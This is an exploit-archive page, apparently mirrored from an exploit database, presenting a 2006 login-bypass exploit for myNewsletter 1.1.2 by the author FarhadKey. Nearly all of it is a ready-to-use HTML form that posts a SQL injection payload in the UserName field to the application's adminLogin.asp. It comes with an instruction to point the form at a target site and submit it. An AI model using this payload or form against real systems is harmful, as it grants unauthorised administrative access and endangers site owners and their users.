[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : myNewsletter <= 1.1.2 (adminLogin.asp) Login Bypass Exploit
# Published : 2006-06-06
# Author : FarhadKey
# Previous Title : Wikiwig <= 4.1 (wk_lang.php) Remote File Include Vulnerability
# Next Title : Claroline <= 1.7.6 (includePath) Remote Code Execution Exploit


<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>

# www.Syue.com [2006-06-06]